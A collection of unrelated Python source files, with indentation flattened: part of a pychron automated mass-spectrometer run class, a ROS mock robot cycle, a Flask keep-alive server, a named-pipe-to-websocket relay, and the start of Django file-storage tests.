inlet = self._convert_valve(inlet)
outlet = self._convert_valve(outlet)
elm = self.extraction_line_manager
if elm:
if outlet:
# close mass spec ion pump
for o in outlet:
for i in range(3):
ok, changed = elm.close_valve(o, mode='script')
if ok:
break
else:
time.sleep(0.1)
else:
from pychron.core.ui.gui import invoke_in_main_thread
invoke_in_main_thread(self.warning_dialog, 'Equilibration: Failed to Close "{}"'.format(o))
self.cancel_run(do_post_equilibration=False)
return
if inlet:
self.info('waiting {}s before opening inlet valve {}'.format(delay, inlet))
time.sleep(delay)
# open inlet
for i in inlet:
for j in range(3):
ok, changed = elm.open_valve(i, mode='script')
if ok:
break
else:
time.sleep(0.1)
else:
from pychron.core.ui.gui import invoke_in_main_thread
invoke_in_main_thread(self.warning_dialog, 'Equilibration: Failed to Open "{}"'.format(i))
self.cancel_run(do_post_equilibration=False)
return
# set the passed in event
evt.set()
# delay for eq time
self.info('equilibrating for {}sec'.format(eqtime))
time.sleep(eqtime)
if self._alive:
# analyze the equilibration
try:
self._analyze_equilibration()
except BaseException as e:
self.debug('AutomatedRun._equilibrate _analyze_equilibration error. Exception={}'.format(e))
self.heading('Equilibration Finished')
if elm and inlet and close_inlet:
for i in inlet:
elm.close_valve(i, mode='script')
if do_post_equilibration:
self.do_post_equilibration()
if self.overlap_evt:
self.debug('setting overlap event. next run ok to start extraction')
self.overlap_evt.set()
def _analyze_equilibration(self):
if self.use_equilibration_analysis and self.plot_panel:
g = self.plot_panel.sniff_graph
xmi, xma = g.get_x_limits()
xma *= 1.25
g.set_x_limits(xmi, xma)
fxs = linspace(xmi, xma)
for i, p in enumerate(g.plots):
try:
xs = g.get_data(i)
except IndexError:
continue
ys = g.get_data(i, axis=1)
if ys is None:
continue
for ni, color, yoff in ((5, 'red', 30), (4, 'green', 10), (3, 'blue', -10), (2, 'orange', -30)):
xsi, ysi = xs[-ni:], ys[-ni:]
g.new_series(xsi, ysi, type='scatter', plotid=i, color=color,
marker_size=2.5)
coeffs = polyfit(xsi, ysi, 1)
fys = polyval(coeffs, fxs)
g.new_series(fxs, fys, type='line', plotid=i, color=color)
txt = 'Slope ({})={:0.3f}'.format(ni, coeffs[0])
g.add_plot_label(txt, plotid=i, overlay_position='inside right',
font='modern 14',
bgcolor='white',
color=color,
y_offset=yoff)
g.redraw()
def _update_labels(self):
self.debug('update labels {}'.format(self.plot_panel))
if self.plot_panel:
for g in (self.plot_panel.isotope_graph, self.plot_panel.sniff_graph):
if g:
self.debug('update labels "{}"'.format(g))
# update the plot_panel labels
plots = g.plots
n = len(plots)
names = []
multiples = []
for i, det in enumerate(self._active_detectors):
if i < n:
name = det.isotope
if name in names:
multiples.append(name)
name = '{}{}'.format(name, det.name)
plots[i].y_axis.title = name
self.debug('setting label {} {} {}'.format(i, det.name, name))
names.append(name)
for i, det in enumerate(self._active_detectors):
if i < n:
name = det.isotope
if name in multiples:
self.debug('second setting label {} {} {}'.format(i, det.name, name))
plots[i].y_axis.title = '{}{}'.format(name, det.name)
g.refresh()
def _update_detectors(self):
for det in self._active_detectors:
self.isotope_group.set_isotope_detector(det)
for det in self._active_detectors:
self.isotope_group.set_isotope_detector(det, add=True)
self._load_previous()
def _set_hv_position(self, pos, detector, update_detectors=True, update_labels=True, update_isotopes=True):
ion = self.ion_optics_manager
if ion is not None:
change = ion.hv_position(pos, detector, update_isotopes=update_isotopes)
def _set_magnet_position(self, pos, detector,
use_dac=False, update_detectors=True,
update_labels=True, update_isotopes=True,
remove_non_active=True, for_collection=True):
change = False
ion = self.ion_optics_manager
if ion is not None:
change = ion.position(pos, detector, use_dac=use_dac, update_isotopes=update_isotopes)
if for_collection:
if update_labels:
self._update_labels()
if update_detectors:
self._update_detectors()
if remove_non_active:
keys = list(self.isotope_group.keys())
for k in keys:
iso = self.isotope_group.isotopes[k]
det = next((di for di in self._active_detectors if di.isotope == iso.name), None)
if det is None:
self.isotope_group.pop(k)
def key(v):
return v[1].name
def key2(v):
return v[1].detector
self.debug('pre cleaned {}'.format(keys))
for name, items in groupby_key(self.isotope_group.items(), key):
items = list(items)
if len(items) > 1:
for det, items in groupby_key(items, key2):
items = list(items)
if len(items) > 1:
for k, v in items:
if v.name == k:
self.isotope_group.isotopes.pop(k)
self.debug('cleaned isotope group {}'.format(keys))
if self.plot_panel:
self.debug('load analysis view')
self.plot_panel.analysis_view.load(self)
self.plot_panel.analysis_view.refresh_needed = True
return change
def _get_data_generator(self):
def gen():
cnt = 0
fcnt = self.failed_intensity_count_threshold
spec = self.spectrometer_manager.spectrometer
self._intensities = {}
while True:
try:
k, s, t = spec.get_intensities(tagged=True)
except NoIntensityChange:
self.warning('Canceling Run. Intensity from mass spectrometer not changing')
try:
self.info('Saving run. Analysis did not complete successfully')
self.save()
except BaseException:
self.warning('Failed to save run')
self.cancel_run(state='failed')
yield None
# the run was canceled above; stop the generator so the unbound
# intensity values are never referenced on the next iteration
return
if not k:
cnt += 1
self.info('Failed getting intensity from mass spectrometer {}/{}'.format(cnt, fcnt))
if cnt >= fcnt:
try:
self.info('Saving run. Analysis did not complete successfully')
self.save()
except BaseException:
self.warning('Failed to save run')
self.warning('Canceling Run. Failed getting intensity from mass spectrometer')
# do we need to cancel the experiment, or will the subsequent pre-run
# checks be sufficient to catch spectrometer communication errors?
self.cancel_run(state='failed')
yield None
return
else:
yield None, None
else:
# reset the counter
cnt = 0
if self.intensity_scalar:
s = [si * self.intensity_scalar for si in s]
self._intensities['tags'] = k
self._intensities['signals'] = s
yield k, s, t
return gen()
def _whiff(self, ncounts, conditionals, starttime, starttime_offset, series, fit_series):
"""
conditionals: list of dicts
"""
for ci in conditionals:
if ci.get('start') is None:
ci['start'] = ncounts
conds = [conditional_from_dict(ci, ActionConditional) for ci in conditionals]
self.isotope_group.conditional_modifier = 'whiff'
self.collector.set_temporary_conditionals(conds)
self.py_data_collection(None, ncounts, starttime, starttime_offset, series, fit_series, group='whiff')
self.collector.clear_temporary_conditionals()
self.isotope_group.conditional_modifier = None
result = self.collector.measurement_result
self._update_persister_spec(whiff_result=result)
self.debug('WHIFF Result={}'.format(result))
return result
def _peak_hop(self, ncycles, ncounts, hops, grpname,
starttime, starttime_offset, series,
check_conditionals):
"""
ncycles: int
hops: list of tuples
hop = 'Isotope:Det[,Isotope:Det,...]', Count, Settling Time(s)
ex.
hop = 'Ar40:H1,Ar36:CDD', 10, 1
"""
self.peak_hop_collector.trait_set(ncycles=ncycles)
self.peak_hop_collector.set_hops(hops)
self.persister.build_peak_hop_tables(grpname, hops)
data_writer = self.persister.get_data_writer(grpname)
return self._measure(grpname,
data_writer,
ncounts,
starttime, starttime_offset,
series, check_conditionals, self.signal_color)
def _sniff(self, ncounts, starttime, starttime_offset, series):
self.debug('py_sniff')
if not self._alive:
return
p = self.plot_panel
if p:
p._ncounts = ncounts
p.is_baseline = False
self.plot_panel.show_sniff_graph()
gn = 'sniff'
self.persister.build_tables(gn, self._active_detectors, ncounts)
# mem_log('build tables')
check_conditionals = False
writer = self.persister.get_data_writer(gn)
result = self._measure(gn,
writer,
ncounts, starttime, starttime_offset,
series,
check_conditionals, self.sniff_color)
return result
def _measure(self, grpname, data_writer,
ncounts, starttime, starttime_offset,
series, check_conditionals, color, script=None):
if script is None:
script = self.measurement_script
# mem_log('pre measure')
if not self.spectrometer_manager:
self.warning('no spectrometer manager')
return True
self.info('measuring {}. ncounts={}'.format(grpname, ncounts),
color=MEASUREMENT_COLOR)
get_data = self._get_data_generator()
debug = globalv.experiment_debug
if debug:
period = 1
else:
period = self._integration_seconds
m = self.collector
m.trait_set(measurement_script=script,
detectors=self._active_detectors,
collection_kind=grpname,
series_idx=series,
check_conditionals=check_conditionals,
ncounts=ncounts,
period_ms=period * 1000,
data_generator=get_data,
data_writer=data_writer,
starttime=starttime,
experiment_type=self.experiment_type,
refresh_age=self.spec.analysis_type in ('unknown', 'cocktail'))
if hasattr(self.spectrometer_manager.spectrometer, 'trigger_acq'):
m.trait_set(trigger=self.spectrometer_manager.spectrometer.trigger_acq)
if self.plot_panel:
self.plot_panel.integration_time = period
self.plot_panel.set_ncounts(ncounts)
if grpname == 'sniff':
self._setup_isotope_graph(starttime_offset, color, grpname)
self._setup_sniff_graph(starttime_offset, color)
elif grpname == 'baseline':
self._setup_baseline_graph(starttime_offset, color)
else:
self._setup_isotope_graph(starttime_offset, color, grpname)
# time.sleep(0.5)
with self.persister.writer_ctx():
m.measure()
# mem_log('post measure')
if m.terminated:
self.debug('measurement terminated')
self.cancel_run(state='terminated')
if m.canceled:
self.debug('measurement collection canceled')
self.cancel_run()
self.executor_event = {'kind': 'cancel', 'confirm': False, 'err': m.err_message}
return not m.canceled
def _get_plot_id_by_ytitle(self, graph, pair, iso=None):
"""
pair is a string of the form <Iso><Det>; iso is just <Iso>
:param graph:
:param pair:
:param iso:
:return: plot id, or None if no matching y-title
"""
idx = graph.get_plotid_by_ytitle(pair)
if idx is None and iso:
if not isinstance(iso, str):
iso = iso.name
idx = graph.get_plotid_by_ytitle(iso)
return idx
def _update_limits(self, graph, starttime_offset):
# update limits
mi, ma = graph.get_x_limits()
max_ = ma
min_ = mi
tc = self.plot_panel.total_seconds
if tc > ma or ma == Inf:
max_ = tc
if starttime_offset > mi:
min_ = -starttime_offset
graph.set_x_limits(min_=min_, max_=max_ * 1.25)
def _setup_baseline_graph(self, starttime_offset, color):
graph = self.plot_panel.baseline_graph
self._update_limits(graph, starttime_offset)
for det in self._active_detectors:
idx = graph.get_plotid_by_ytitle(det.name)
if idx is not None:
try:
graph.series[idx][0]
except IndexError as e:
graph.new_series(marker='circle',
color=color,
type='scatter',
marker_size=1.25,
fit='linear',
plotid=idx,
use_error_envelope=False,
add_inspector=False,
add_tools=False)
def _setup_sniff_graph(self, starttime_offset, color):
graph = self.plot_panel.sniff_graph
self._update_limits(graph, starttime_offset)
series = self.collector.series_idx
for k, iso in self.isotope_group.items():
idx = self._get_plot_id_by_ytitle(graph, k, iso)
if idx is not None:
try:
graph.series[idx][series]
except IndexError as e:
graph.new_series(marker='circle',
color=color,
type='scatter',
marker_size=1.25,
fit=None,
plotid=idx,
use_error_envelope=False,
add_inspector=False,
add_tools=False)
def _setup_isotope_graph(self, starttime_offset, color, grpname):
"""
executing in the main thread is necessary.
set the graph limits and construct the necessary series
set 0-count fits
"""
graph = self.plot_panel.isotope_graph
self._update_limits(graph, starttime_offset)
regressing = grpname != 'sniff'
series = self.collector.series_idx
for k, iso in self.isotope_group.items():
idx = self._get_plot_id_by_ytitle(graph, k, iso)
if idx is not None:
try:
graph.series[idx][series]
except IndexError as e:
fit = None if grpname == 'sniff' else iso.get_fit(0)
graph.new_series(marker='circle',
color=color,
type='scatter',
marker_size=1.25,
fit=fit,
plotid=idx,
use_error_envelope=False,
add_inspector=False,
add_tools=False)
if regressing:
graph.set_regressor(iso.regressor, idx)
scnt, fcnt = (2, 1) if regressing else (1, 0)
self.debug('"{}" increment series count="{}" '
'fit count="{}" regressing="{}"'.format(grpname, scnt, fcnt, regressing))
self.measurement_script.increment_series_counts(scnt, fcnt)
def _wait_for(self, predicate, msg):
st = time.time()
i = 0
while self._alive:
time.sleep(1.0)
et = time.time() - st
if predicate(et):
break
if i % 5 == 0:
self.debug(msg(et))
i = 0
i += 1
def _wait_for_min_ms_pumptime(self):
overlap, mp = self.spec.overlap
pt = self.min_ms_pumptime
if not overlap:
self.debug('no overlap. not waiting for min ms pumptime')
return
if self.is_first:
self.debug('this is the first run. not waiting for min ms pumptime')
return
if not mp:
self.debug('using default min ms pumptime={}'.format(pt))
mp = pt
# ensure min mass spectrometer pump time
# wait until pumping started
self.debug('wait for mass spec pump out to start')
self._wait_for(lambda x: self.ms_pumptime_start is not None,
lambda x: 'waiting for mass spec pumptime to start {:0.2f}'.format(x))
# wait for min pump time
self.debug('mass spec pump out started')
self._wait_for(lambda x: self.elapsed_ms_pumptime > mp,
lambda x: 'waiting for min mass spec pumptime {}, elapse={:0.2f}'.format(mp, x))
self.debug('min pumptime elapsed {} {}'.format(mp, self.elapsed_ms_pumptime))
# ===============================================================================
# scripts
# ===============================================================================
def _load_script(self, name):
script = None
sname = getattr(self.script_info, '{}_script_name'.format(name))
if sname and sname != NULL_STR:
sname = self._make_script_name(sname)
script = self._bootstrap_script(sname, name)
return script
def _bootstrap_script(self, fname, name):
# global SCRIPTS
global WARNED_SCRIPTS
def warn(fn, e):
self.spec.executable = False
if fn not in WARNED_SCRIPTS:
WARNED_SCRIPTS.append(fn)
self.warning_dialog('Invalid Script {}\n{}'.format(fn, e))
self.debug('loading script "{}"'.format(fname))
func = getattr(self, '_{}_script_factory'.format(name))
s = func()
if s and os.path.isfile(s.filename):
if s.bootstrap():
s.set_default_context()
else:
fname = s.filename if s else fname
e = 'Not a file'
warn(fname, e)
return s
def _measurement_script_factory(self):
from pychron.pyscripts.measurement_pyscript import MeasurementPyScript
sname = self.script_info.measurement_script_name
sname = self._make_script_name(sname)
from pychron.spectrometer.thermo.manager.base import ThermoSpectrometerManager
from pychron.spectrometer.isotopx.manager.ngx import NGXSpectrometerManager
klass = MeasurementPyScript
if isinstance(self.spectrometer_manager, ThermoSpectrometerManager):
from pychron.pyscripts.thermo_measurement_pyscript import ThermoMeasurementPyScript
klass = ThermoMeasurementPyScript
elif isinstance(self.spectrometer_manager, NGXSpectrometerManager):
from pychron.pyscripts.ngx_measurement_pyscript import NGXMeasurementPyScript
klass = NGXMeasurementPyScript
ms = klass(root=paths.measurement_dir, name=sname, automated_run=self, runner=self.runner)
return ms
def _extraction_script_factory(self, klass=None):
ext = self._ext_factory(paths.extraction_dir, self.script_info.extraction_script_name, klass=klass)
if ext is not None:
ext.automated_run = self
return ext
def _post_measurement_script_factory(self):
return self._ext_factory(paths.post_measurement_dir, self.script_info.post_measurement_script_name)
def _post_equilibration_script_factory(self):
return self._ext_factory(paths.post_equilibration_dir, self.script_info.post_equilibration_script_name)
def _ext_factory(self, root, file_name, klass=None):
file_name = self._make_script_name(file_name)
if os.path.isfile(os.path.join(root, file_name)):
if klass is None:
from pychron.pyscripts.extraction_line_pyscript import ExtractionPyScript
klass = ExtractionPyScript
obj = klass(root=root, name=file_name, runner=self.runner)
return obj
def _make_script_name(self, name):
name = '{}_{}'.format(self.spec.mass_spectrometer.lower(), name)
return add_extension(name, '.py')
def _setup_context(self, script):
"""
setup_context to expose variables to the pyscript
"""
ctx = self.spec.make_script_context()
script.setup_context(is_last=self.is_last, **ctx)
def _get_yaml_parameter(self, script, key, default):
if not script:
return default
m = ast.parse(script.text)
docstr = ast.get_docstring(m)
if docstr:
docstr = docstr.strip()
# self.debug('{} {} metadata\n{}'.format(script.name, key, docstr))
try:
params = yload(docstr)
return params[key]
except KeyError:
self.warning('No value "{}" in metadata'.format(key))
except TypeError:
self.warning('Invalid yaml docstring in "{}". Could not retrieve "{}"'.format(script.name, key))
else:
self.debug('No metadata section in "{}". Using default "{}" value for "{}"'.format(script.name,
default, key))
return default
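# e.g. a script whose docstring carries YAML metadata (values hypothetical;
# 'eqtime' and 'sensitivity_multiplier' are the keys requested elsewhere in
# this class):
# '''
# eqtime: 15
# sensitivity_multiplier: 1.0
# '''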
def _get_collector(self):
c = self.peak_hop_collector if self.is_peak_hop else self.multi_collector
return c
def _assemble_extraction_blob(self):
_names, txt = self._assemble_script_blob(kinds=(EXTRACTION, POST_EQUILIBRATION, POST_MEASUREMENT))
return txt
def _assemble_script_blob(self, kinds=None):
if kinds is None:
kinds = SCRIPT_KEYS
okinds = []
bs = []
for s in kinds:
sc = getattr(self, '{}_script'.format(s))
if sc is not None:
bs.append((sc.name, sc.toblob()))
okinds.append(s)
return assemble_script_blob(bs, kinds=okinds)
# ===============================================================================
# handlers
# ===============================================================================
def _runner_changed(self, new):
self.debug('runner changed: {}'.format(new))
for s in SCRIPT_NAMES:
sc = getattr(self, s)
if sc is not None:
setattr(sc, 'runner', new)
# ===============================================================================
# defaults
# ===============================================================================
def _peak_hop_collector_default(self):
from pychron.experiment.automated_run.peak_hop_collector import PeakHopCollector
c = PeakHopCollector(console_display=self.console_display,
automated_run=self)
return c
def _multi_collector_default(self):
from pychron.experiment.automated_run.multi_collector import MultiCollector
c = MultiCollector(console_display=self.console_display,
automated_run=self)
return c
# ===============================================================================
# property get/set
# ===============================================================================
@property
def elapsed_ms_pumptime(self):
return time.time() - self.ms_pumptime_start
# ============= EOF =============================================
|
mock_full_cycle.py | import threading
import time
import rospy
from std_msgs.msg import String, Bool
from mock.mock_robot_consumption import mock_robot_consumption
from mock.mock_current_step import mock_current_step, Step
from mock.mock_resistance import mock_resistance
from mock.mock_puck_colors import mock_puck_colors
from mock.mock_letters import mock_letters
from mock.mock_puck_is_in_grip import mock_puck_is_in_grip
from mock.mock_puck_is_not_in_grip import mock_puck_is_not_in_grip
rospy.init_node('mock_full_cycle', anonymous=True)
robot_consumption_publisher = rospy.Publisher('robot_consumption', String, queue_size=10)
current_step_publisher = rospy.Publisher('current_step', String, queue_size=10)
resistance_publisher = rospy.Publisher('resistance', String, queue_size=10)
puck_colors_publisher = rospy.Publisher('puck_colors', String, queue_size=10)
letters_publisher = rospy.Publisher('letters', String, queue_size=10)
movement_publisher = rospy.Publisher('movement_vectors_string', String, queue_size=10)
def handle_start_cycle(_):
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToResistanceStation.name)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ReadResistance.name)
execute_then_sleep(mock_resistance, resistance_publisher)
execute_then_sleep(mock_puck_colors, puck_colors_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToControlPanel.name)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ReadControlPanel.name)
execute_then_sleep(mock_letters, letters_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToFirstPuckAndGrabFirstPuck.name)
execute_then_sleep(mock_puck_is_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToFirstCornerAndReleaseFirstPuck.name)
execute_then_sleep(mock_puck_is_not_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToSecondPuckAndGrabSecondPuck.name)
execute_then_sleep(mock_puck_is_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToSecondCornerAndReleaseSecondPuck.name)
execute_then_sleep(mock_puck_is_not_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToThirdPuckAndGrabThirdPuck.name)
execute_then_sleep(mock_puck_is_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToThirdCornerAndReleaseThirdPuck.name)
execute_then_sleep(mock_puck_is_not_in_grip, movement_publisher)
execute_then_sleep(mock_current_step, current_step_publisher, Step.ToSquareCenter.name)
execute_then_sleep(mock_current_step, current_step_publisher, Step.CycleEndedAndRedLedOn.name)
def execute_then_sleep(execute, *args):
execute(*args)
time.sleep(1)
def mock_full_cycle():
threading.Thread(target=lambda: mock_robot_consumption(robot_consumption_publisher)).start()
rospy.Subscriber("start_cycle", Bool, handle_start_cycle)
rospy.spin()
if __name__ == '__main__':
mock_full_cycle()
|
alive.py | from flask import Flask
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Bot started! Running..."
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
websocket.py | import asyncio
import websockets
import sys
import os, errno, tempfile
from signal import *
from config import named_pipe_path, websocket_port, websocket_host, debug_mode, use_ssl, cert_file, key_file, refresh_rate
import threading
from queue import Queue
import json
import time
import ssl
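# The config module is assumed (not shown here) to define: named_pipe_path
# (str), websocket_host (str), websocket_port (int), debug_mode and use_ssl
# (bool), cert_file and key_file (paths), and refresh_rate (seconds).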
if debug_mode:
print ("Websocket CLI Debug mode is ON")
if debug_mode:
print ("cert_file "+cert_file)
print ("key_file "+key_file)
try:
if debug_mode:
print("creating fifo")
os.mkfifo(named_pipe_path)
if debug_mode:
print("fifo created")
except OSError as oe:
if oe.errno != errno.EEXIST:
raise
# queue of messages to be delivered
my_queue = Queue(maxsize=0)
# list of connected clients on ws
connected_list = []
# list of authenticated clients
identified_map = dict()
async def connectionHandler(websocket, path):
global connected_list
global identified_map
connected_list.append(websocket)
try:
message = await websocket.recv()
except:
connected_list.remove(websocket)
return
decoded_message = json.loads(message)
identified_map[decoded_message['recipient']] = connected_list.index(websocket)
if debug_mode:
print ("Add to connected list index: " + str(connected_list.index(websocket)) + " litening to recipient: " + decoded_message['recipient'])
try:
await asyncio.sleep(3600 * 24)
except:
connected_list.remove(websocket)
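# A hedged sketch of the JSON shapes this server assumes (recipient names
# below are made up). The first frame a client sends identifies who it
# listens for:
#   {"recipient": "alice"}
# and each line read from the named pipe must carry a matching recipient
# plus the payload forwarded by send_messages():
#   {"recipient": "alice", "content": "hello"}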
def read_file_callback():
time.sleep(refresh_rate)
tmp = fifo.readline()
if tmp != "":
if debug_mode:
print("Received data: "+tmp)
data = json.loads(tmp)
my_queue.put(data)
async def send_messages():
global connected_list
global identified_map
while True:
message = my_queue.get()
if message['recipient'] in identified_map:
connected_index = identified_map[message['recipient']]
if debug_mode:
print ("Connected list index: " + str(connected_index))
i = connected_list[connected_index]
if i.state_name == 'OPEN':
data = {"content": message['content']}
await i.send(json.dumps(data))
else:
if debug_mode:
print ("No one listening to recipient: " + message['recipient'])
def websocket_thread():
second_loop = asyncio.new_event_loop()
if use_ssl:
ctx = ssl.SSLContext( ssl.PROTOCOL_SSLv23)
ctx.load_cert_chain(cert_file, key_file)
start_server = websockets.serve(connectionHandler, websocket_host, websocket_port, ssl=ctx)
else:
start_server = websockets.serve(connectionHandler, websocket_host, websocket_port)
second_loop.run_until_complete(start_server)
second_loop.run_forever()
return
def message_dispatch_thread():
third_loop = asyncio.new_event_loop()
third_loop.run_until_complete(send_messages())
third_loop.run_forever()
return
threads = []
t = threading.Thread(target=websocket_thread)
threads.append(t)
t.start()
t2 = threading.Thread(target=message_dispatch_thread)
threads.append(t2)
t2.start()
loop = asyncio.get_event_loop()
fifo = open(named_pipe_path, 'r', 1)
loop.add_reader(fifo.fileno(), read_file_callback)
loop.run_forever()
if debug_mode:
print ("Exiting")
def clean(*args):
os.remove(named_pipe_path)
sys.exit(0)
for sig in (SIGABRT, SIGILL, SIGINT, SIGSEGV, SIGTERM):
signal(sig, clean)
|
tests.py | import os
import shutil
import sys
import tempfile
import threading
import time
import unittest
from datetime import datetime, timedelta
from io import StringIO
from urllib.request import urlopen
from django.core.cache import cache
from django.core.exceptions import SuspiciousFileOperation
from django.core.files.base import ContentFile, File
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import (
InMemoryUploadedFile, SimpleUploadedFile, TemporaryUploadedFile,
)
from django.db.models.fields.files import FileDescriptor
from django.test import (
LiveServerTestCase, SimpleTestCase, TestCase, override_settings,
)
from django.test.utils import requires_tz_support
from django.urls import NoReverseMatch, reverse_lazy
from django.utils import timezone
from .models import Storage, temp_storage, temp_storage_location
FILE_SUFFIX_REGEX = '[A-Za-z0-9]{7}'
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import doesn't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'storage'"):
get_storage_class('storage.NonexistentStorage')
def test_get_nonexistent_storage_class(self):
"""
get_storage_class raises an error if the requested class doesn't exist.
"""
with self.assertRaises(ImportError):
get_storage_class('django.core.files.storage.NonexistentStorage')
def test_get_nonexistent_storage_module(self):
"""
get_storage_class raises an error if the requested module doesn't exist.
"""
with self.assertRaisesMessage(ImportError, "No module named 'django.core.files.nonexistent_storage'"):
get_storage_class('django.core.files.nonexistent_storage.NonexistentStorage')
class FileSystemStorageTests(unittest.TestCase):
def test_deconstruction(self):
path, args, kwargs = temp_storage.deconstruct()
self.assertEqual(path, "django.core.files.storage.FileSystemStorage")
self.assertEqual(args, ())
self.assertEqual(kwargs, {'location': temp_storage_location})
kwargs_orig = {
'location': temp_storage_location,
'base_url': 'http://myfiles.example.com/'
}
storage = FileSystemStorage(**kwargs_orig)
path, args, kwargs = storage.deconstruct()
self.assertEqual(kwargs, kwargs_orig)
def test_lazy_base_url_init(self):
"""
FileSystemStorage.__init__() shouldn't evaluate base_url.
"""
storage = FileSystemStorage(base_url=reverse_lazy('app:url'))
with self.assertRaises(NoReverseMatch):
storage.url(storage.base_url)
class FileStorageTests(SimpleTestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir, base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_empty_location(self):
"""
An empty location falls back to the current working directory.
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, os.getcwd())
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def _test_file_time_getter(self, getter):
# Check for correct behavior under both USE_TZ=True and USE_TZ=False.
# The tests are similar since they both set up a situation where the
# system time zone, Django's TIME_ZONE, and UTC are distinct.
self._test_file_time_getter_tz_handling_on(getter)
self._test_file_time_getter_tz_handling_off(getter)
@override_settings(USE_TZ=True, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_on(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5. The following will be aware in UTC.
now = timezone.now()
self.assertFalse(self.storage.exists('test.file.tz.on'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.on', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be aware, in UTC
self.assertTrue(timezone.is_aware(dt))
self.assertEqual(now.tzname(), dt.tzname())
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and now should be the same effective time.
self.assertLess(abs(dt - now), timedelta(seconds=2))
@override_settings(USE_TZ=False, TIME_ZONE='Africa/Algiers')
def _test_file_time_getter_tz_handling_off(self, getter):
# Django's TZ (and hence the system TZ) is set to Africa/Algiers which
# is UTC+1 and has no DST change. We can set the Django TZ to something
# else so that UTC, Django's TIME_ZONE, and the system timezone are all
# different.
now_in_algiers = timezone.make_aware(datetime.now())
with timezone.override(timezone.get_fixed_timezone(-300)):
# At this point the system TZ is +1 and the Django TZ
# is -5.
self.assertFalse(self.storage.exists('test.file.tz.off'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file.tz.off', f)
self.addCleanup(self.storage.delete, f_name)
dt = getter(f_name)
# dt should be naive, in system (+1) TZ
self.assertTrue(timezone.is_naive(dt))
# The three timezones are indeed distinct.
naive_now = datetime.now()
algiers_offset = now_in_algiers.tzinfo.utcoffset(naive_now)
django_offset = timezone.get_current_timezone().utcoffset(naive_now)
utc_offset = timezone.utc.utcoffset(naive_now)
self.assertGreater(algiers_offset, utc_offset)
self.assertLess(django_offset, utc_offset)
# dt and naive_now should be the same effective time.
self.assertLess(abs(dt - naive_now), timedelta(seconds=2))
# If we convert dt to an aware object using the Algiers
# timezone then it should be the same effective time to
# now_in_algiers.
_dt = timezone.make_aware(dt, now_in_algiers.tzinfo)
self.assertLess(abs(_dt - now_in_algiers), timedelta(seconds=2))
def test_file_get_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
atime = self.storage.get_accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(os.path.getatime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_accessed_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_accessed_time_timezone(self):
self._test_file_time_getter(self.storage.get_accessed_time)
def test_file_get_created_time(self):
"""
File storage returns a datetime for the creation time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
ctime = self.storage.get_created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(os.path.getctime(self.storage.path(f_name))))
self.assertLess(timezone.now() - self.storage.get_created_time(f_name), timedelta(seconds=2))
@requires_tz_support
def test_file_get_created_time_timezone(self):
self._test_file_time_getter(self.storage.get_created_time)
def test_file_get_modified_time(self):
"""
File storage returns a datetime for the last modified time of a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.addCleanup(self.storage.delete, f_name)
mtime = self.storage.get_modified_time(f_name)
